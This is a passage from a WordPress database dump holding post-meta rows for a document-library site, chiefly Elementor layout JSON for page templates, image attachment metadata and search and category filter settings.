Community<\\/p>\",\"align\":\"center\",\"text_color\":\"#0A3C11\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Roboto\",\"typography_font_size\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]},\"typography_font_weight\":\"400\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"ece91c3\",\"elType\":\"widget\",\"settings\":{\"text\":\"Signup, It\'s free!\",\"align\":\"center\",\"size\":\"xs\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Roboto\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_font_weight\":\"700\",\"background_color\":\"#10CD2AB8\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"f28ff03\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":9.047000000000000596855898038484156131744384765625},\"elements\":[{\"id\":\"aed2366\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/seal.png\",\"id\":440,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":true}],\"isInner\":true},{\"id\":\"c6086e6\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"background_background\":\"classic\",\"background_color\":\"#0A3C11\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"e9d09e5\"}],\"structure\":\"20\"},\"elements\":[{\"id\":\"e0c2519\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":86.921999999999997044142219237983226776123046875},\"elements\":[{\"id\":\"647b188\",\"elType\":\"widget\",\"settings\":{\"menu\":\"main_menu\",\"align_items\":\"left\",\"pointer\":\"none\",\"menu_typography_typography\":\"custom\",\"menu_typography_font_family\":\"Roboto\",\"menu_typography_font_size\":{\"unit\":\"px\",\"size\":17,\"sizes\":[]},\"menu_typography_font_weight\":\"400\",\"color_menu_item\":\"#FFFFFF\",\"color_menu_item_hover\":\"#D1E4DD\",\"pointer_color_menu_item_hover\":\"#D1E4DD\",\"color_dropdown_item\":\"#0A3C11\",\"color_dropdown_item_hover\":\"#FFFFFF\",\"background_color_dropdown_item_hover\":\"#0A3C11\",\"custom_css\":\".sub-menu-toggle {display:none;}\"},\"elements\":[],\"widgetType\":\"nav-menu\"}],\"isInner\":true},{\"id\":\"f95713d\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":13.0210000000000007958078640513122081756591796875,\"content_position\":\"center\",\"text_align\":\"center\"},\"elements\":[{\"id\":\"3c1f6ee\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[gtranslate]\"},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false}]'),(27955,4053,'_elementor_conditions','a:1:{i:0;s:15:\"include/general\";}'),(27958,4054,'_elementor_edit_mode','builder'),(27959,4054,'_elementor_template_type','single-post'),(27960,4054,'_elementor_version','3.4.0'),(27961,4054,'_elementor_pro_version','3.3.6'),(27962,4054,'_edit_lock','1629397939:43'),(27963,4055,'_wp_attached_file','2021/08/Untitled4.png'),(27964,4055,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:300;s:6:\"height\";i:427;s:4:\"file\";s:21:\"2021/08/Untitled4.png\";s:5:\"sizes\";a:6:{s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"Untitled4-211x300.png\";s:5:\"width\";i:211;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"Untitled4-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:21:\"Untitled4-300x265.png\";s:5:\"width\";i:300;s:6:\"height\";i:265;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"kava-thumb-s\";a:4:{s:4:\"file\";s:20:\"Untitled4-150x85.png\";s:5:\"width\";i:150;s:6:\"height\";i:85;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"kava-thumb-s-2\";a:4:{s:4:\"file\";s:21:\"Untitled4-230x230.png\";s:5:\"width\";i:230;s:6:\"height\";i:230;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"kava-thumb-m\";a:4:{s:4:\"file\";s:21:\"Untitled4-300x400.png\";s:5:\"width\";i:300;s:6:\"height\";i:400;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(27968,4056,'_elementor_edit_mode','builder'),(27969,4056,'_elementor_template_type','single-post'),(27970,4056,'_elementor_version','3.4.0'),(27971,4056,'_elementor_pro_version','3.3.6'),(27972,4054,'_wp_page_template','default'),(27973,4054,'_elementor_data','[{\"id\":\"7a3bcba\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"481c11e\"}]},\"elements\":[{\"id\":\"ac58913\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"f18e8a2\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"5e9dbe0\"}],\"structure\":\"20\"},\"elements\":[{\"id\":\"68f9cb8\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":55.13900000000000289901436190120875835418701171875},\"elements\":[{\"id\":\"c51cdd1\",\"elType\":\"widget\",\"settings\":{\"__dynamic__\":{\"title\":\"[elementor-tag id=\\\"\\\" name=\\\"post-title\\\" settings=\\\"%7B%22before%22%3A%22%22%2C%22after%22%3A%22%22%2C%22fallback%22%3A%22%22%7D\\\"]\"},\"title\":\"Add Your Heading Text Here\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Roboto\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"typography_font_weight\":\"700\"},\"elements\":[],\"widgetType\":\"theme-post-title\"},{\"id\":\"9ab9f6d\",\"elType\":\"widget\",\"settings\":{\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":18,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"theme-post-content\"},{\"id\":\"db4478e\",\"elType\":\"widget\",\"settings\":{\"view\":\"traditional\",\"icon_list\":[{\"type\":\"terms\",\"selected_icon\":{\"value\":\"far fa-user-circle\",\"library\":\"fa-regular\"},\"_id\":\"e52bdc6\",\"custom_date_format\":\"F j, Y\",\"custom_time_format\":\"g:i a\",\"taxonomy\":\"resource_category\",\"text_prefix\":\"Category:\",\"show_icon\":\"none\"},{\"type\":\"custom\",\"selected_icon\":{\"value\":\"fas fa-calendar\",\"library\":\"fa-solid\"},\"_id\":\"153328f\",\"custom_date_format\":\"F j, Y\",\"custom_time_format\":\"g:i a\",\"link\":\"\",\"show_icon\":\"none\",\"__dynamic__\":{\"custom_text\":\"[elementor-tag id=\\\"ca1925c\\\" name=\\\"pods-text\\\" settings=\\\"%7B%22key%22%3A%22document%3A419%3Aby%22%2C%22before%22%3A%22Published%20by%3A%20%22%7D\\\"]\"}},{\"type\":\"custom\",\"selected_icon\":{\"value\":\"far fa-clock\",\"library\":\"fa-regular\"},\"_id\":\"06e8c1e\",\"custom_date_format\":\"F j, Y\",\"custom_time_format\":\"g:i a\",\"link\":\"\",\"show_icon\":\"none\",\"__dynamic__\":{\"custom_text\":\"[elementor-tag id=\\\"bbc9234\\\" name=\\\"pods-text\\\" settings=\\\"%7B%22key%22%3A%22document%3A419%3Ayear%22%2C%22before%22%3A%22Year%3A%20%22%7D\\\"]\"}},{\"type\":\"custom\",\"selected_icon\":{\"value\":\"far fa-comment-dots\",\"library\":\"fa-regular\"},\"_id\":\"ffee03d\",\"custom_date_format\":\"F j, Y\",\"custom_time_format\":\"g:i a\",\"link\":\"\",\"show_icon\":\"none\",\"__dynamic__\":{\"custom_text\":\"[elementor-tag id=\\\"f812c12\\\" name=\\\"post-id\\\" settings=\\\"%7B%22before%22%3A%22Document%20ID%3A%20%22%7D\\\"]\"}},{\"type\":\"custom\",\"selected_icon\":{\"value\":\"far fa-comment-dots\",\"library\":\"fa-regular\"},\"custom_date_format\":\"F j, Y\",\"custom_time_format\":\"g:i a\",\"link\":\"\",\"show_icon\":\"none\",\"__dynamic__\":{\"custom_text\":\"[elementor-tag id=\\\"14bd592\\\" name=\\\"shortcode\\\" settings=\\\"%7B%22shortcode%22%3A%22%5Bpost-views%5D%22%7D\\\"]\"},\"_id\":\"7e35ea7\"},{\"_id\":\"5fb5326\",\"custom_date_format\":\"F j, Y\",\"custom_time_format\":\"g:i a\",\"text_prefix\":\"Date Uploaded: \",\"link\":\"\",\"show_icon\":\"none\"}],\"space_between\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"icon_align\":\"left\",\"divider\":\"yes\",\"divider_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"divider_color\":\"#0A3C1142\",\"text_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":18,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"post-info\"}],\"isInner\":true},{\"id\":\"0a721c7\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":44.86099999999999710098563809879124164581298828125},\"elements\":[{\"id\":\"9d5c93f\",\"elType\":\"widget\",\"settings\":{\"__dynamic__\":{\"image\":\"[elementor-tag id=\\\"8ec61c3\\\" name=\\\"pods-image\\\" settings=\\\"%7B%22key%22%3A%22document%3A419%3Adocument_cover_image%22%7D\\\"]\"}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"b93d6bc\",\"elType\":\"widget\",\"settings\":{\"text\":\"Download Document\",\"link\":{\"url\":\"#\",\"is_external\":\"on\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"center\",\"size\":\"xs\",\"selected_icon\":{\"value\":\"far fa-arrow-alt-circle-down\",\"library\":\"fa-regular\"},\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":18,\"sizes\":[]},\"background_color\":\"#0A3C11\",\"hover_color\":\"#0A3C11\",\"button_background_hover_color\":\"#02010100\",\"border_border\":\"solid\",\"border_color\":\"#0A3C11\",\"__dynamic__\":{\"link\":\"[elementor-tag id=\\\"d82915f\\\" name=\\\"Pods-url\\\" settings=\\\"%7B%22key%22%3A%22document%3A419%3Adownload_link%22%7D\\\"]\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false}]'),(27974,4057,'_elementor_edit_mode','builder'),(27975,4057,'_elementor_template_type','single-post'),(27976,4057,'_elementor_version','3.4.0'),(27977,4057,'_elementor_pro_version','3.3.6'),(27978,4057,'_wp_page_template','default'),(27979,4057,'_elementor_data','[{\"id\":\"7a3bcba\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"481c11e\"}]},\"elements\":[{\"id\":\"ac58913\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"f18e8a2\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"5e9dbe0\"}],\"structure\":\"20\"},\"elements\":[{\"id\":\"68f9cb8\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[],\"isInner\":true},{\"id\":\"0a721c7\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"9d5c93f\",\"elType\":\"widget\",\"settings\":{\"__dynamic__\":{\"image\":\"[elementor-tag id=\\\"8ec61c3\\\" name=\\\"pods-image\\\" settings=\\\"%7B%7D\\\"]\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false}]'),(27982,4054,'_elementor_conditions','a:1:{i:0;s:25:\"include/singular/document\";}'),(27983,576,'oembed_enabled_providers_gfycatcom','0'),(27984,576,'oembed_enabled_providers_icloudcom','0'),(27985,576,'oembed_enabled_providers_loomcom','0'),(27986,576,'oembed_enabled_providers_mesh','0'),(27987,576,'oembed_enabled_providers_odeslico','0'),(27988,576,'oembed_enabled_providers_sketchfabcom','0'),(27989,576,'oembed_enabled_providers_tiktokcom','0'),(27990,576,'oembed_enabled_providers_wistiacom','0'),(27991,576,'pick_display_format_multi','default'),(27992,576,'pick_display_format_separator',', '),(27993,420,'oembed_enabled_providers_gfycatcom','0'),(27994,420,'oembed_enabled_providers_icloudcom','0'),(27995,420,'oembed_enabled_providers_loomcom','0'),(27996,420,'oembed_enabled_providers_mesh','0'),(27997,420,'oembed_enabled_providers_odeslico','0'),(27998,420,'oembed_enabled_providers_sketchfabcom','0'),(27999,420,'oembed_enabled_providers_tiktokcom','0'),(28000,420,'oembed_enabled_providers_wistiacom','0'),(28001,420,'pick_display_format_multi','default'),(28002,420,'pick_display_format_separator',', '),(28003,578,'website_repeatable','0'),(28020,4054,'_elementor_page_settings','a:2:{s:12:\"preview_type\";s:15:\"single/document\";s:10:\"preview_id\";s:4:\"3541\";}'),(28021,4059,'_elementor_edit_mode','builder'),(28022,4059,'_elementor_template_type','single-post'),(28023,4059,'_elementor_version','3.4.0'),(28024,4059,'_elementor_pro_version','3.3.6'),(28025,4059,'_wp_page_template','default'),(28026,4059,'_elementor_data','[{\"id\":\"7a3bcba\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"481c11e\"}]},\"elements\":[{\"id\":\"ac58913\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"f18e8a2\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"5e9dbe0\"}],\"structure\":\"20\"},\"elements\":[{\"id\":\"68f9cb8\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":55.13900000000000289901436190120875835418701171875},\"elements\":[{\"id\":\"c51cdd1\",\"elType\":\"widget\",\"settings\":{\"__dynamic__\":{\"title\":\"[elementor-tag id=\\\"\\\" name=\\\"post-title\\\" settings=\\\"%7B%22before%22%3A%22%22%2C%22after%22%3A%22%22%2C%22fallback%22%3A%22%22%7D\\\"]\"},\"title\":\"Add Your Heading Text Here\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Roboto\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"typography_font_weight\":\"700\"},\"elements\":[],\"widgetType\":\"theme-post-title\"},{\"id\":\"9ab9f6d\",\"elType\":\"widget\",\"settings\":{\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":18,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"theme-post-content\"},{\"id\":\"db4478e\",\"elType\":\"widget\",\"settings\":{\"view\":\"traditional\",\"icon_list\":[{\"type\":\"terms\",\"selected_icon\":{\"value\":\"far fa-user-circle\",\"library\":\"fa-regular\"},\"_id\":\"e52bdc6\",\"custom_date_format\":\"F j, Y\",\"custom_time_format\":\"g:i a\",\"taxonomy\":\"resource_category\",\"text_prefix\":\"Category:\",\"show_icon\":\"none\"},{\"type\":\"custom\",\"selected_icon\":{\"value\":\"fas fa-calendar\",\"library\":\"fa-solid\"},\"_id\":\"153328f\",\"custom_date_format\":\"F j, Y\",\"custom_time_format\":\"g:i a\",\"link\":\"\",\"show_icon\":\"none\",\"__dynamic__\":{\"custom_text\":\"[elementor-tag id=\\\"ca1925c\\\" name=\\\"pods-text\\\" settings=\\\"%7B%22key%22%3A%22document%3A419%3Aby%22%2C%22before%22%3A%22Published%20by%3A%20%22%7D\\\"]\"}},{\"type\":\"custom\",\"selected_icon\":{\"value\":\"far fa-clock\",\"library\":\"fa-regular\"},\"_id\":\"06e8c1e\",\"custom_date_format\":\"F j, Y\",\"custom_time_format\":\"g:i a\",\"link\":\"\",\"show_icon\":\"none\",\"__dynamic__\":{\"custom_text\":\"[elementor-tag id=\\\"bbc9234\\\" name=\\\"pods-text\\\" settings=\\\"%7B%22key%22%3A%22document%3A419%3Ayear%22%2C%22before%22%3A%22Year%3A%20%22%7D\\\"]\"}},{\"type\":\"custom\",\"selected_icon\":{\"value\":\"far fa-comment-dots\",\"library\":\"fa-regular\"},\"_id\":\"ffee03d\",\"custom_date_format\":\"F j, Y\",\"custom_time_format\":\"g:i a\",\"link\":\"\",\"show_icon\":\"none\",\"__dynamic__\":{\"custom_text\":\"[elementor-tag id=\\\"f812c12\\\" name=\\\"post-id\\\" settings=\\\"%7B%22before%22%3A%22Document%20ID%3A%20%22%7D\\\"]\"}},{\"type\":\"custom\",\"selected_icon\":{\"value\":\"far fa-comment-dots\",\"library\":\"fa-regular\"},\"custom_date_format\":\"F j, Y\",\"custom_time_format\":\"g:i a\",\"link\":\"\",\"show_icon\":\"none\",\"__dynamic__\":{\"custom_text\":\"[elementor-tag id=\\\"14bd592\\\" name=\\\"shortcode\\\" settings=\\\"%7B%22shortcode%22%3A%22%5Bpost-views%5D%22%7D\\\"]\"},\"_id\":\"7e35ea7\"},{\"_id\":\"5fb5326\",\"custom_date_format\":\"F j, Y\",\"custom_time_format\":\"g:i a\",\"text_prefix\":\"Date Uploaded: \",\"link\":\"\",\"show_icon\":\"none\"}],\"space_between\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"icon_align\":\"left\",\"divider\":\"yes\",\"divider_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"divider_color\":\"#0A3C1142\",\"text_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":18,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"post-info\"}],\"isInner\":true},{\"id\":\"0a721c7\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":44.86099999999999710098563809879124164581298828125},\"elements\":[{\"id\":\"9d5c93f\",\"elType\":\"widget\",\"settings\":{\"__dynamic__\":{\"image\":\"[elementor-tag id=\\\"8ec61c3\\\" name=\\\"pods-image\\\" settings=\\\"%7B%22key%22%3A%22document%3A419%3Adocument_cover_image%22%7D\\\"]\"}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"b93d6bc\",\"elType\":\"widget\",\"settings\":{\"text\":\"Download Document\",\"link\":{\"url\":\"#\",\"is_external\":\"on\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"center\",\"size\":\"xs\",\"selected_icon\":{\"value\":\"far fa-arrow-alt-circle-down\",\"library\":\"fa-regular\"},\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":18,\"sizes\":[]},\"background_color\":\"#0A3C11\",\"hover_color\":\"#0A3C11\",\"button_background_hover_color\":\"#02010100\",\"border_border\":\"solid\",\"border_color\":\"#0A3C11\",\"__dynamic__\":{\"link\":\"[elementor-tag id=\\\"d82915f\\\" name=\\\"Pods-url\\\" settings=\\\"%7B%22key%22%3A%22document%3A419%3Adownload_link%22%7D\\\"]\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false}]'),(28028,4059,'_elementor_conditions','a:8:{i:0;s:25:\"include/singular/document\";i:1;s:37:\"include/singular/in_resource_category\";i:2;s:46:\"include/singular/in_resource_category_children\";i:3;s:32:\"include/singular/in_resource_tag\";i:4;s:41:\"include/singular/in_resource_tag_children\";i:5;s:33:\"include/singular/in_resource_type\";i:6;s:42:\"include/singular/in_resource_type_children\";i:7;s:35:\"include/singular/document_by_author\";}'),(28030,4059,'_elementor_page_settings','a:2:{s:12:\"preview_type\";s:15:\"single/document\";s:10:\"preview_id\";s:4:\"3541\";}'),(28032,4060,'_elementor_edit_mode','builder'),(28033,4060,'_elementor_template_type','loop'),(28034,4060,'_elementor_version','3.4.0'),(28035,4060,'_elementor_pro_version','3.3.6'),(28036,4060,'_wp_page_template','default'),(28037,4060,'_elementor_page_settings','a:2:{s:12:\"preview_type\";s:15:\"single/document\";s:10:\"preview_id\";s:4:\"3541\";}'),(28038,4060,'_elementor_data','[{\"id\":\"97b774f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"d196435\"}],\"background_background\":\"classic\",\"background_color\":\"#FFFFFFA8\"},\"elements\":[{\"id\":\"58e5283\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5fea59f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"ef533a9\"}],\"structure\":\"20\"},\"elements\":[{\"id\":\"18398f5\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50},\"elements\":[{\"id\":\"ec82dac\",\"elType\":\"widget\",\"settings\":{\"__dynamic__\":{\"title\":\"[elementor-tag id=\\\"\\\" name=\\\"post-title\\\" settings=\\\"%7B%22before%22%3A%22%22%2C%22after%22%3A%22%22%2C%22fallback%22%3A%22%22%7D\\\"]\"},\"title\":\"Add Your Heading Text Here\",\"align\":\"left\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Roboto\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"typography_font_weight\":\"500\"},\"elements\":[],\"widgetType\":\"theme-post-title\"},{\"id\":\"766d5fb\",\"elType\":\"widget\",\"settings\":{\"view\":\"traditional\",\"icon_list\":[{\"type\":\"terms\",\"selected_icon\":{\"value\":\"far fa-user-circle\",\"library\":\"fa-regular\"},\"_id\":\"c35d24b\",\"custom_date_format\":\"F j, Y\",\"custom_time_format\":\"g:i a\",\"taxonomy\":\"resource_category\",\"text_prefix\":\"Category:\",\"show_icon\":\"none\"},{\"selected_icon\":{\"value\":\"fas fa-calendar\",\"library\":\"fa-solid\"},\"_id\":\"796caf9\",\"custom_date_format\":\"F j, Y\",\"custom_time_format\":\"g:i a\",\"text_prefix\":\"Uploaded:\",\"link\":\"\",\"show_icon\":\"none\"},{\"type\":\"custom\",\"selected_icon\":{\"value\":\"far fa-clock\",\"library\":\"fa-regular\"},\"_id\":\"b3c26a1\",\"custom_date_format\":\"F j, Y\",\"custom_time_format\":\"g:i a\",\"link\":\"\",\"show_icon\":\"none\",\"__dynamic__\":{\"custom_text\":\"[elementor-tag id=\\\"bede178\\\" name=\\\"pods-text\\\" settings=\\\"%7B%22key%22%3A%22document%3A419%3Ayear%22%2C%22before%22%3A%22Year%20Published%3A%20%22%7D\\\"]\"}},{\"type\":\"custom\",\"selected_icon\":{\"value\":\"far fa-clock\",\"library\":\"fa-regular\"},\"custom_date_format\":\"F j, Y\",\"custom_time_format\":\"g:i a\",\"link\":\"\",\"show_icon\":\"none\",\"__dynamic__\":{\"custom_text\":\"[elementor-tag id=\\\"bede178\\\" name=\\\"pods-text\\\" settings=\\\"%7B%22key%22%3A%22document%3A419%3Aby%22%2C%22before%22%3A%22By%3A%20%22%7D\\\"]\"},\"_id\":\"9db8e27\"}],\"space_between\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"icon_align\":\"left\",\"divider_color\":\"#0A3C11\",\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":9,\"sizes\":[]},\"icon_typography_font_weight\":\"400\"},\"elements\":[],\"widgetType\":\"post-info\"}],\"isInner\":true},{\"id\":\"4395636\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":49.832999999999998408384271897375583648681640625},\"elements\":[{\"id\":\"fce80b4\",\"elType\":\"widget\",\"settings\":{\"__dynamic__\":{\"image\":\"[elementor-tag id=\\\"d762b8d\\\" name=\\\"pods-image\\\" settings=\\\"%7B%22key%22%3A%22document%3A419%3Adocument_cover_image%22%7D\\\"]\"},\"align\":\"left\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false}]'),(28045,4062,'_edit_lock','1629294857:38'),(28046,4062,'_edit_last','38'),(28047,3261,'_pods_document_cover_image','a:1:{i:0;i:3563;}'),(28052,3261,'document_cover_image','3563'),(28053,3261,'attached_document','3262'),(28054,4062,'_filter_label','Search'),(28055,4062,'_active_label','Search'),(28056,4062,'_filter_type','search'),(28057,4062,'_date_source','meta_query'),(28058,4062,'_is_hierarchical','false'),(28059,4062,'_ih_source_map',''),(28060,4062,'_data_source',''),(28061,4062,'_rating_options','5'),(28062,4062,'_rating_compare_operand','greater'),(28063,4062,'_source_taxonomy','category'),(28064,4062,'_terms_relational_operator','OR'),(28065,4062,'_source_post_type','post'),(28066,4062,'_add_all_option','false'),(28067,4062,'_all_option_label','All'),(28068,4062,'_ability_deselect_radio','false'),(28069,4062,'_show_empty_terms','false'),(28070,4062,'_only_child','false'),(28071,4062,'_group_by_parent','false'),(28072,4062,'_source_custom_field',''),(28073,4062,'_source_get_from_field_data','false'),(28074,4062,'_custom_field_source_plugin','jet_engine'),(28075,4062,'_source_manual_input',''),(28076,4062,'_color_image_type','0'),(28077,4062,'_color_image_behavior','checkbox'),(28078,4062,'_source_color_image_input',''),(28079,4062,'_source_manual_input_range',''),(28080,4062,'_placeholder','Select...'),(28081,4062,'_s_placeholder','Search...'),(28082,4062,'_is_custom_checkbox','false'),(28083,4062,'_s_by','default'),(28084,4062,'_date_format','mm/dd/yy'),(28085,4062,'_date_from_placeholder',''),(28086,4062,'_date_to_placeholder',''),(28087,4062,'_date_period_type','range'),(28088,4062,'_date_period_datepicker_button_text','Select Date'),(28089,4062,'_date_period_start_end_enabled','true'),(28090,4062,'_date_period_format',''),(28091,4062,'_date_period_start_format',''),(28092,4062,'_date_period_separator',''),(28093,4062,'_date_period_end_format',''),(28094,4062,'_range_inputs_enabled','false'),(28095,4062,'_values_prefix',''),(28096,4062,'_values_suffix',''),(28097,4062,'_values_thousand_sep',''),(28098,4062,'_values_decimal_sep','.'),(28099,4062,'_values_decimal_num','0'),(28100,4062,'_source_min',''),(28101,4062,'_source_max',''),(28102,4062,'_source_step',''),(28103,4062,'_source_callback','0'),(28104,4062,'_use_exclude_include','0'),(28105,4062,'_data_exclude_include','a:1:{i:0;s:0:\"\";}'),(28106,4062,'_alphabet_behavior','checkbox'),(28107,4062,'_alphabet_radio_deselect','true'),(28108,4062,'_alphabet_options','A, B, C, D, E, F, G, H, I, J, K, L, M, N, O, P, Q, R, S, T, U, V, W, X, Y, Z'),(28109,4062,'_query_var',''),(28110,4062,'_query_compare','equal'),(28111,4062,'license',''),(28112,4063,'_edit_lock','1629295047:38'),(28113,4063,'_edit_last','38'),(28114,4063,'_filter_label','Filter by Category'),(28115,4063,'_active_label','Filter by Category'),(28116,4063,'_filter_type','checkboxes'),(28117,4063,'_date_source','meta_query'),(28118,4063,'_is_hierarchical','false'),(28119,4063,'_ih_source_map',''),(28120,4063,'_data_source','taxonomies'),(28121,4063,'_rating_options','5'),(28122,4063,'_rating_compare_operand','greater'),(28123,4063,'_source_taxonomy','resource_category'),(28124,4063,'_terms_relational_operator','OR'),(28125,4063,'_source_post_type','post'),(28126,4063,'_add_all_option','false'),(28127,4063,'_all_option_label','All'),(28128,4063,'_ability_deselect_radio','false'),(28129,4063,'_show_empty_terms','false'),(28130,4063,'_only_child','false'),(28131,4063,'_group_by_parent','false'),(28132,4063,'_source_custom_field',''),(28133,4063,'_source_get_from_field_data','false'),(28134,4063,'_custom_field_source_plugin','jet_engine'),(28135,4063,'_source_manual_input',''),(28136,4063,'_color_image_type','0'),(28137,4063,'_color_image_behavior','checkbox'),(28138,4063,'_source_color_image_input',''),(28139,4063,'_source_manual_input_range',''),(28140,4063,'_placeholder','Select...'),(28141,4063,'_s_placeholder','Search...'),(28142,4063,'_is_custom_checkbox','false'),(28143,4063,'_s_by','default'),(28144,4063,'_date_format','mm/dd/yy'),(28145,4063,'_date_from_placeholder',''),(28146,4063,'_date_to_placeholder',''),(28147,4063,'_date_period_type','range'),(28148,4063,'_date_period_datepicker_button_text','Select 